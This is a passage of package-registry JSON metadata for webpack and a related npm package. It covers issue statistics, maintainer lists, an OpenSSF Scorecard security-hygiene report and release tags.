/opencollective.com/webpack"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T17:39:29.481Z","issues_count":10162,"pull_requests_count":9399,"avg_time_to_close_issue":10837189.563112684,"avg_time_to_close_pull_request":2756725.7170131044,"issues_closed_count":9895,"pull_requests_closed_count":8852,"pull_request_authors_count":1443,"issue_authors_count":6683,"avg_comments_per_issue":5.834776618775831,"avg_comments_per_pull_request":3.1609745717629534,"merged_pull_requests_count":5992,"bot_issues_count":8,"bot_pull_requests_count":2909,"past_year_issues_count":80,"past_year_pull_requests_count":908,"past_year_avg_time_to_close_issue":899649.5272727272,"past_year_avg_time_to_close_pull_request":370883.2323943662,"past_year_issues_closed_count":55,"past_year_pull_requests_closed_count":710,"past_year_pull_request_authors_count":80,"past_year_issue_authors_count":62,"past_year_avg_comments_per_issue":3.4125,"past_year_avg_comments_per_pull_request":4.709251101321586,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":138,"past_year_merged_pull_requests_count":559,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/issues","maintainers":[{"login":"sokra","count":1358,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sokra"},{"login":"alexander-akait","count":1057,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"vankop","count":196,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vankop"},{"login":"ooflorent","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ooflorent"},{"login":"TheLarkInn","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheLarkInn"},{"login":"hai-x","count":123,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":111,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"timse","count":100,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/timse"},{"login":"snitin315","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/snitin315"},{"login":"jhnns","count":78,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jhnns"},{"login":"xtuc","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xtuc"},{"login":"smelukov","count":52,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/smelukov"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"evenstensberg","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"chenxsan","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chenxsan"},{"login":"Legends","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Legends"},{"login":"Jessidhia","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Jessidhia"},{"login":"ScriptedAlchemy","count":31,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ScriptedAlchemy"},{"login":"avivkeller","count":30,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"jamesgeorge007","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jamesgeorge007"},{"login":"michael-ciniawsky","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/michael-ciniawsky"},{"login":"EugeneHlushko","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/EugeneHlushko"},{"login":"Connormiha","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Connormiha"},{"login":"hiroppy","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hiroppy"},{"login":"samccone","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/samccone"},{"login":"SpaceK33z","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/SpaceK33z"},{"login":"mc-zone","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mc-zone"},{"login":"sendilkumarn","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sendilkumarn"},{"login":"gajus","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gajus"},{"login":"byzyk","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/byzyk"},{"login":"ljqx","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljqx"},{"login":"gpoitch","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gpoitch"},{"login":"nveenjain","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nveenjain"},{"login":"kentcdodds","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kentcdodds"},{"login":"jbottigliero","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jbottigliero"},{"login":"JounQin","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/JounQin"},{"login":"edmorley","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edmorley"},{"login":"montogeek","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/montogeek"},{"login":"elliottsj","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/elliottsj"},{"login":"burhanuday","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/burhanuday"},{"login":"pierreneter","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pierreneter"},{"login":"Janpot","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Janpot"},{"login":"ovflowd","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"},{"login":"billyjanitsch","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/billyjanitsch"},{"login":"keblodev","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/keblodev"},{"login":"shama","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shama"},{"login":"anikethsaha","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anikethsaha"},{"login":"ljcrapo","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljcrapo"},{"login":"matheus1lva","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/matheus1lva"},{"login":"rishabh3112","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rishabh3112"},{"login":"joshwiens","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/joshwiens"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"reergymerej","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/reergymerej"},{"login":"jeremenichelli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jeremenichelli"},{"login":"aboktor","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aboktor"},{"login":"MrKou47","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/MrKou47"},{"login":"mikegreiling","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mikegreiling"},{"login":"eemeli","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/eemeli"},{"login":"mattlewis92","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mattlewis92"},{"login":"pranshuchittora","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pranshuchittora"},{"login":"3ru","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/3ru"},{"login":"ryanclark","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ryanclark"},{"login":"sapegin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sapegin"},{"login":"loveky","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/loveky"},{"login":"edocipriano","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edocipriano"},{"login":"PatrickJS","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/PatrickJS"},{"login":"jevancc","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jevancc"},{"login":"chrisdothtml","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chrisdothtml"},{"login":"anshumanv","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anshumanv"}],"active_maintainers":[{"login":"alexander-akait","count":416,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"hai-x","count":82,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":55,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"avivkeller","count":30,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"evenstensberg","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"ovflowd","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-22.04/packages/node-webpack/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-22.04/packages/node-webpack/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-22.04/packages/node-webpack/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-22.04/packages/node-webpack/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-22.04/packages/node-webpack/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-22.04/packages/node-webpack/codemeta","maintainers":[],"registry":{"name":"ubuntu-22.04","url":"https://launchpad.net/ubuntu/jammy","ecosystem":"ubuntu","default":false,"packages_count":34289,"maintainers_count":0,"namespaces_count":4,"keywords_count":1498,"github":"ubuntu","metadata":{"codename":"jammy","funded_packages_count":1076},"icon_url":"https://github.com/ubuntu.png","created_at":"2026-02-04T11:01:46.486Z","updated_at":"2026-09-02T05:06:07.182Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-22.04/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-22.04/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-22.04/namespaces"}},{"id":913998,"name":"@ecapp/webpack","ecosystem":"npm","description":"Packs CommonJs/AMD modules for the browser. Allows to split your codebase into multiple bundles, which can be loaded on demand. Support loaders to preprocess files, i.e. json, jsx, es7, css, less, ... and your custom stuff.","homepage":"https://github.com/webpack/webpack","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/webpack/webpack","keywords_array":[],"namespace":"ecapp","versions_count":3,"first_release_published_at":"2021-01-18T02:35:42.975Z","latest_release_published_at":"2021-01-22T02:51:45.190Z","latest_release_number":"0.1.2","last_synced_at":"2026-09-02T02:51:11.292Z","created_at":"2022-04-07T16:46:03.698Z","updated_at":"2026-09-02T02:51:11.292Z","registry_url":"https://www.npmjs.com/package/@ecapp/webpack","install_command":"npm install @ecapp/webpack","documentation_url":null,"metadata":{"funding":{"type":"opencollective","url":"https://opencollective.com/webpack"},"dist-tags":{"latest":"0.1.2"},"contentPolicy":null},"repo_metadata":{"id":2686067,"uuid":"3678731","full_name":"webpack/webpack","owner":"webpack","description":"A bundler for javascript and friends. Packs many modules into a few bundled assets. Code Splitting allows for loading parts of the application on demand. Through \"loaders\", modules can be CommonJs, AMD, ES6 modules, CSS, Images, JSON, Coffeescript, LESS, ... and your custom stuff.","archived":false,"fork":false,"pushed_at":"2026-08-29T15:08:44.000Z","size":97455,"stargazers_count":65964,"open_issues_count":135,"forks_count":9523,"subscribers_count":1466,"default_branch":"main","last_synced_at":"2026-08-29T15:15:16.900Z","etag":null,"topics":["amd","build-tool","commonjs","compiler","es2015","es6","esm","javascript","javascript-compiler","javascript-modules","loaders","module-bundler","plugins","web","web-performance","webpack"],"latest_commit_sha":null,"homepage":"https://webpack.js.org","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/webpack.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":"GOVERNANCE.md","roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":null,"dco":null,"cla":null,"disclosure":null},"funding":{"open_collective":"webpack"}},"created_at":"2012-03-10T10:08:14.000Z","updated_at":"2026-08-29T14:54:50.000Z","dependencies_parsed_at":"2026-08-29T15:24:21.824Z","dependency_job_id":null,"html_url":"https://github.com/webpack/webpack","commit_stats":{"total_commits":12493,"total_committers":934,"mean_commits":"13.375802997858672","dds":0.5586328343872569,"last_synced_commit":"89dfc9a5c575dc691e3ac6a965d39c854fca3986"},"previous_names":[],"tags_count":672,"template":false,"template_full_name":null,"purl":"pkg:github/webpack/webpack","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/sbom","scorecard":{"id":546233,"data":{"date":"2025-07-28","repo":{"name":"github.com/webpack/webpack","commit":"de79ee457eb921e6e1b186c90c65590789a013ca"},"scorecard":{"version":"v5.2.1-26-g4feedb85","commit":"4feedb857ab8d82158aa9774bf8054df41992180"},"score":6,"checks":[{"name":"Code-Review","score":5,"reason":"Found 12/24 approved changesets -- score normalized to 5","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#code-review"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#packaging"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 12 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:6","Info: topLevel 'contents' permission set to 'read': .github/workflows/examples.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:13","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#token-permissions"}},{"name":"Security-Policy","score":9,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Warn: One or no descriptive hints of disclosure, vulnerability, and/or timelines in security policy","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#cii-best-practices"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#branch-protection"}},{"name":"Binary-Artifacts","score":0,"reason":"binaries present in source code","details":["Warn: binary detected: examples/nodejs-addons/file.node:1","Warn: binary detected: examples/wasm-bindgen-esm/pkg/hi_wasm_bg.wasm:1","Warn: binary detected: examples/wasm-simple/add.wasm:1","Warn: binary detected: examples/wasm-simple/factorial.wasm:1","Warn: binary detected: examples/wasm-simple/fibonacci.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory2.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory3.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/other.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/wasm.wasm:1","Warn: binary detected: test/cases/wasm/imports-multiple/wasm.wasm:1","Warn: binary detected: test/cases/wasm/v128/v128.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/testFunction.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/configCases/wasm/externref/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/configCases/wasm/missing-wasm-experiment/wasm.wasm:1","Warn: binary detected: test/configCases/wasm/reference-types/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/0/wasm.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/1/wasm.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/examples.yml:29: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:72: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:77: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:85: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:96: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:98: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:109: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:111: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:118: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:124: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:162: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:163: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:174: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:200: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:207: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Info:   0 out of  22 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 28 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-20T09:35:41.151Z","repository_id":2686067,"created_at":"2025-08-20T09:35:41.151Z","updated_at":"2025-08-20T09:35:41.151Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36974490,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-08-29T02:00:05.978Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"webpack","name":"webpack","uuid":"2105791","kind":"organization","description":"","email":null,"website":"https://webpack.js.org","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/2105791?v=4","repositories_count":50,"last_synced_at":"2024-10-29T23:38:53.364Z","metadata":{"has_sponsors_listing":false,"funding":{"open_collective":"webpack"}},"html_url":"https://github.com/webpack","funding_links":["https://opencollective.com/webpack"],"total_stars":95072,"followers":924,"following":0,"created_at":"2022-11-02T16:19:08.894Z","updated_at":"2024-10-29T23:38:53.365Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack/repositories"},"tags":[{"name":"v5.110.1","sha":"0b2952e15bb1aa9a198acbbfdcb9a0dc1aabb5af","kind":"commit","published_at":"2026-08-27T20:00:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.110.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.110.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.110.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.110.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.110.1/manifests"},{"name":"v5.110.0","sha":"3a7c0e6e27f90f9c5e407c18506a5034aabcf27d","kind":"commit","published_at":"2026-08-27T11:27:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.110.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.110.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.110.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5